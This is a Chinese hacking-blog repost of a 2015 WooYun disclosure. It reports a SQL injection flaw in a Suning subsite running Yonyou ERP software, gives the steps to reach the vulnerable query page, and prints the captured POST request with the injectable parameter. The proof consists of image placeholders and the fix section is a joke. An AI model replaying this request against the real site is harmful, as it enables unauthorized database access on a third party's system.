记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

苏宁易购某分站SQL注入漏洞(用友产品)

2015-01-05 14:20

漏洞存在于http://erp.suning.com.cn/epp/

先注册个账户:test123/testtest

登录进去,点击【入围通知】--查询,并抓包:

code 区域
POST /epp/core HTTP/1.1

Accept: */*

Accept-Language: zh-cn

Referer: http://erp.suning.com.cn/epp/core/manageui.jsp?ctrl=nc.web.epp.k0160.EntryPublishController&delegator=nc.web.epp.k0160.EntryPublishDelegator&roleid=0A&pageId=H0K30160

method: POST /epp/core HTTP/1.1

Content-Type: application/x-www-form-urlencoded;charset=UTF-8

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)

Host: erp.suning.com.cn

Content-Length: 604

Proxy-Connection: Keep-Alive

Pragma: no-cache

Cookie: JSESSIONID=36BB27D5ADE629156151ABA7DFBFFF06.server; JSESSIONID=B42E4B218B630709D26EB7836EE0B7A5.server



type=query&xml=<rpc><dataset id='epp_entrypublishlist_pp_ip_entrypublish' pageindex='0' ><req-parameters><parameter name='$$query_template_condition'>%20bisoverdue%20%3D%20%26apos%3BN%26apos%3B%20*</parameter><parameter name='query_param_values_list'>%7B%3D%2CString%2Cbisoverdue%2CN%7D%2C%7B%3D%2CString%2Cbisfailed%2CN%7D%2C</parameter><parameter name='$$from_query_model'>true</parameter></req-parameters></dataset></rpc>&delegator=nc.web.epp.k0160.EntryPublishDelegator&pageId=H0K30160&pageUniqueId=4a7bb237-51e9-4ff1-8858-3d92ded30ad8&isAjax=1





1.jpg

漏洞证明:

1.jpg

修复方案:

你们懂的

知识来源: www.wooyun.org/bugs/wooyun-2015-089486

阅读:120454 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“苏宁易购某分站SQL注入漏洞(用友产品)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

推广

标签云